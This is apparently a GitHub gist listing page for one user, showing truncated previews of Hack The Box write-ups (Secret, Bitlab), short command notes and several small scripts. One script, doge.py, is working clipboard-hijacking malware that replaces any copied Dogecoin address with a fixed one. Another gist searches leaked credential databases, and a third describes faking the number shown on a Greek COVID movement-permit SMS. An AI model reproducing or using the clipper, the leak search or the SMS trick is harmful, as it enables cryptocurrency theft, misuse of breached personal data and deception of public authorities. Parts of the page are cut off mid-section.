3rg1s / secret.md
Last active December 10, 2022 21:48
secret.md

Summary

Secret was an easy machine. The source code of the API was provided to us. With this we could use `git log` and see the token_secret, which we could use to access an admin feature that allowed us to provide a filename, which we then used to gain a reverse shell. Root had a binary with the setuid bit set, but coredumps were also enabled, which we used to dump the memory state of the program while the content of the file we wanted to read was in it. This is how we got the id_rsa of root and then SSHed in as root.

Enumeration

Nmap

nmap found three open ports: 22, 80 and 3000.

nmap

Webserver port 80

@3rg1s
3rg1s / pdf.md
Created May 12, 2021 13:20
Pdf commands

Commands I used to split pdf and arrange them.

Extract all pages

```python
from PyPDF2 import PdfFileWriter, PdfFileReader

inputpdf = PdfFileReader(open("marg.pdf", "rb"))

# The gist preview is cut off here; the loop below is an assumed continuation
# that writes each page of the input to its own single-page PDF.
for i in range(inputpdf.numPages):
    output = PdfFileWriter()
    output.addPage(inputpdf.getPage(i))
    with open("page-%d.pdf" % (i + 1), "wb") as out:
        output.write(out)
```
@3rg1s
3rg1s / smbclient.md
Last active April 17, 2021 13:38
Smbclient commands to connect to host

Smbclient

List Shares (NO password)

smbclient -L \\apt

Login to share (No password)

@3rg1s
3rg1s / Powershell.md
Last active March 16, 2021 10:46
Powershell Commands.

list filesystem disks

powershell -c get-psdrive -psprovider filesystem

show hidden folders

dir -Force

get hexdump from a file

@3rg1s
3rg1s / doge.py
Last active June 2, 2021 11:37
When dogecoin address detected on the clipboard replace it with another one.
```python
import re, pyperclip

while True:
    s = pyperclip.paste()
    addr = re.findall(r"^[DT][a-km-zA-HJ-NP-Z1-9]{25,34}$", s)
    if addr:
        pyperclip.copy("D5kYkMmkKKNNvvEsx31FvirNT6oEyeirAi")
```
@3rg1s
3rg1s / scylla.py
Created December 15, 2020 12:04
Search inside leaked databases.
```python
import requests
import urllib3
import sys

urllib3.disable_warnings()
payload = {'q': str(sys.argv[1]), 'size': '100', 'start': '0'}
r = requests.get('https://scylla.sh/search', params=payload, verify=False)
print(r.text)
```
@3rg1s
3rg1s / 13033.md
Created December 15, 2020 12:03
Trick 13033 by sending an SMS to your own number and getting an instant response.

As COVID rises you are asked to use a movement certificate form, or to send an SMS to 13033, in Greece.

The data policy located here, as of 9 April 2020, states that our message is deleted once we get the response back, and that the message information is deleted or anonymized and used for statistical purposes.

If you use Signal you can edit the sender's contact name to 13033, which will then show as 13033, making it nearly impossible for someone to notice that this is not the number you are sending the SMS to.

import os, time 

Hello fellow hackers,

From the nmap scan I have 7 open ports.

# Nmap 7.80 scan initiated Wed Sep  9 05:06:25 2020 as: nmap -sC -sV -oN initial 10.10.10.197
Nmap scan report for 10.10.10.197
Host is up (0.078s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
@3rg1s
3rg1s / Bitlab.md
Last active January 30, 2020 23:10

Bitlab

Ports 80 and 22 are open. Visiting 80 we see a GitLab server. I find the credentials at this URL: http://10.10.10.114/help/bookmarks.html. When I click "Github Login", I see obfuscated JavaScript. I copy the code, paste it into the JavaScript console, run it, and get the variable content, which gives me the login credentials.

Login Creds

I go to the Profile project, upload a PHP file with reverse shell code inside it, and commit it to the repo. I then visit http://10.10.10.114/profile/shell.php and get a reverse shell as www-data.

Intended to Root